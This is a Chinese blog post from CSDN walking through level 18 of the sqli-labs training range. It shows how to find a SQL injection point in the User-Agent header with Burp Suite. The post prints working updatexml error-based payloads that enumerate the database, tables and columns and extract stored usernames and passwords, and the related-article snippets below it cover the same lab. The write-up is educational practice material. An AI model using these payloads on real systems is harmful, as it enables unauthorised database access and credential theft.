sqli-labs-less-18 http头user agent+报错注入

最新推荐文章于 2024-07-17 17:29:24 发布
最新推荐文章于 2024-07-17 17:29:24 发布
阅读量310 收藏 4
点赞数 1
分类专栏: sql注入 文章标签: HTTP头注入 SQL注入 burpsuite UserAgent 数据库安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/109692054
版权

Less-18

首先利用burp suite抓包分析:
在这里插入图片描述
在这里插入图片描述

Username和password验证正确时,返回ip地址和user agent信息
验证错误时,只返回ip地址

所以该关卡是user agent的hppt头注入,
我们可以构造playload更改数据包

更改user agent:

在这里插入图片描述

UA作为数据包中的信息,最后又返回出来,说明后台可能使用了insert into函数将UA插入到数据库,然后再进行输出,
Insert into table value(v01,v02,)

首先判断UA是否存在注入

可以通过更改UA信息:
将UA更改为’,显示UA,并且返回了错误信息,通过错误信息我们可以看到,返回了ip和id名,因此猜测UA信息传入后台数据库可能的insert into语句是:insert into table value(‘UA’,‘ip’,‘id’);
在这里插入图片描述

因为返回的错误中ip和id的闭合方式为‘’,因此我们猜测UA的闭合方式也是‘’,接下来验证猜想:
构造UA为1’,1,1)#
在这里插入图片描述

可以看到验证成功,并没有报错,这样我们可以修改第UA位置的语句,将我们需要获取的信息通过sql语句带入数据库中,再通过报错信息带出:

获取当前数据库名:

’ or updatexml(1,concat(0x7e,(database())),1),1,1)#
在这里插入图片描述
在这里插入图片描述

获取数据库中的表:

’ or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)),1),1,1)#
在这里插入图片描述

’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)),1),1,1)#
在这里插入图片描述

获取users表中的字段:

’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)),1),1,1)#
在这里插入图片描述

获取username的数据:

’ or updatexml(1,concat(0x7e,(select group_concat(username) from security.users)),1),1,1)#
在这里插入图片描述

获取password字段的数据:

’ or updatexml(1,concat(0x7e,(select group_concat(password) from security.users)),1),1,1)#
在这里插入图片描述

yzcn
关注
专栏目录
SQL-Lab 18~22
qq_52921637的博客
03-21 311
less18 第十八关我们可以看到,这一关是注入 首先,我们应该在本关中加入sql语句:当我们使用用户名:admin 和密码:admin的时候,会出现错误,并显现出IP地址:这是因为,我们在上一关修改了密码:当我们使用,用户名:admin 密码:afafa时会显示:(登录成功)此时会出现:你的IP地址和User-Agent :我们可以用post数据包header部的注入,注入点是User-Agent 步骤:设置代理,burp抓取数据包,将数据包寄到repeater然后再使用SQL注入语句即可报出数据库版本
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http部注入相关
m0_54899775的博客
12-19 1434
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http部注入相关 sqlilabs Less-18、Less-19、Less-20、Less-21、Less-22
sqli-labs--------第18
wyzhxhn的博客
11-10 1263
sql插入语句 User-Agent
SQLI-LABS靶场18关:Truncated incorrect DOUBLE value错误
最新发布
sinat_39522506的博客
07-17 265
注入时,PAYLOAD正确,但是出现Truncated incorrect DOUBLE value:Mozilla/5.0 (Windows NT 10.0;sql版本换到5.5.29版本(5.5.x应该都可以)如果显示数据库连接失败,重启一下靶场。
SQL注入:sqli-labs 18 基于HTTP部的报错注入
Zeker62的博客
08-12 154
报错注入参考博客: https://www.cnblogs.com/c1047509362/p/12806297.html 依旧输入账户名和密码:抓包 发现会回显出HTTP内容 登录,抓包,改变内容: 加个单引号,报错了 说明这个变量是括号括起来的字符型变量。 但是这个是HTTP报文,没有注释,没法搞回显点。 报错注入:aaa’ and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1’='1 最后一个1后面不加单引号是因为想和后面的127.
sqli-labs-Less18 User-Agent注入
feng的博客
09-24 292
进入之前看了看题目的提示,是header injection,大致就知道考的是什么了。 进入环境,输入admin,admin,回显了127.0.0.1和我们的user agent。这时候我们要抓包看看,想想ip和user-agent哪个是我们可以注入的,发现ip似乎注入不了,只能user-agent注入。 接下来的user-agent注入就有些讲究了,需要把注入点闭合的情况给试出来,也可以直接去看源码。 如果要试的话,怎么试呢?先输入',发现报错回显了: 这里的回显可能看的还是有些迷,但是多少可以猜测出参
sqli-labs 18 基于http中的参数注入
devilare的博客
01-18 280
sqli-labs-master/Less-18 来到18关,跟前几关唯一的不同点就是多出一行提示 尝试admin登录查看源码发现 $uagent = $_SERVER[‘HTTP_USER_AGENT’]; $IP = SERVER[′REMOTEADDR′];echo"<br>";echo′YourIPADDRESSis:′._SERVER['REMOTE_ADDR']; echo "<br>"; echo 'Your IP ADDRESS is: ' .S​ERVER[′R
SQLI-labs-第十八关
weixin_54055099的博客
05-17 570
Sqli-labs18关,http部注入,报错注入
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1194
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3242
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1685
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs靶场实现(六)【HTTP中的SQL注入】(less-18~19(User-Agent、Referer)、具体步骤+图文详解)
weixin_46709219的博客
12-26 755
一)HTTP中的SQL注入   1)HTTP中的注入介绍   2)HTTP User-Agent注入   3)HTTP Referer注入   4)sqlmap安全测试 ———————————————————————————————————————————————————————— 一)HTTP中的SQL注入 1)HTTP中的注入介绍 上面代码中使用的方法解析: 1)check_input()——判断是否有输入一个变量$value 2)empty()——判断变量$value的值是否为空 3)
SQL-labs的第18关——http请求注入(User-Agent报错注入
qq_73393033的博客
07-21 479
并且,在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们这次使用extractvalue函数进行报错注入。我们在截取的数据包中的User-Agent上加上一个'。它显示了User-Agent,我们大胆猜测注入点在这里。通过改变mid函数的后面两个参数可以改变返回的内容。很显然,这里的数据没有显示完全。账号:admin ,密码:admin。这说明闭合方式就是'。
HTTPUser-Agent注入
weixin_53519320的博客
10-28 1818
HTTPUser-Agent注入 学习user-agent注入找到靶场来训练一下 user agent是指用户代理,简称 UA。 HTTPUser-Agent注入 insert="INSERTINTO′security′.′uagents′(′uagent′,′ipaddress′,′username′)VALUES(′insert="INSERT INTO'security'.'uagents'('uagent','ip_address','username') VALUES ('insert="I
sql_labs18
陈艺秋的博客
05-20 110
判断闭合符,在User-Agent字段结束添加单引号,触发报错说明闭合符有用,但是下面的报错信息有点看不懂,User-Agent字段后面咋还跟了俩数据。看到了admin后面有个单括号,说明前面也是拥有一个左括号与之闭合,所以我们可以在注入语句后多添加一个右括号,绕过。之后经过查看知道了两个admin就可以登录上,并且可以查看到user_agent信息。多构造一个括号,这里不晓得为啥--+注释符不行,换成了#注释符,成功回显相关信息。还有就是既然发生了闭合,那么我们也可以在语句之后再构造一个单引号,绕过。
sqli-labs-less-19 基于http Referer 报错注入
yzcn
11-15 312
Less-19 该关卡与less-18类似,只是less-18在登录正确是返回UA信息,而该关卡返回Referer信息,因此做法与less-18类似,只是在抓到的包中将Referer换成我们需要进行查询的sql语句,利用错误注入,将我们需要的信息通过错误返回带出。 判断Referer闭合方式: 将Referer更改为’,返回: 可以猜测Referer传入后台数据库的语句是insert into table value(‘Referer’,‘ip’) 验证猜想,将Referer更改为1’,1)# 没有报错
sql-lab 11~20总结(后续持续更新)内含18关火狐无法抓到本地包的解决方法
m0_62879498的博客
12-17 2749
十一题的传参方式变成了post传参 但注入方式差不多 判断注入点 ​ 'or 1=1 – q 判断字段数 ’or 1=1 order by 2 – q 判断回显点 ​ ’ union select 1,2-- q 查询相关内容 判断库名 ’ union select 1,database()-- q 判断表名 ’ union select 1,table_name from information_schema.tables where table_
SQLI-Labs(18-22关)请求注入
weixin_52515588的博客
03-27 231
我们用之前的方法在username 和 password的位置进行注入测试发现没有注入点,既然这道题提示你这样了,那么就可以在user-agent的后面添加一个单引号。User-agent:浏览器的身份识别字符串 【简单来说就是根据这个字段来判断是通过PC端还是手机端访问的,在一些情况下可以通过更改这个字段来看到手机端的执行效果】X-Forwarded-For:可以看到真实IP,具体原理可以百度,我之前的笔记也有关于这个字段的一些攻击利用方式。这里需要引入几个数据信息。referer注入。
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值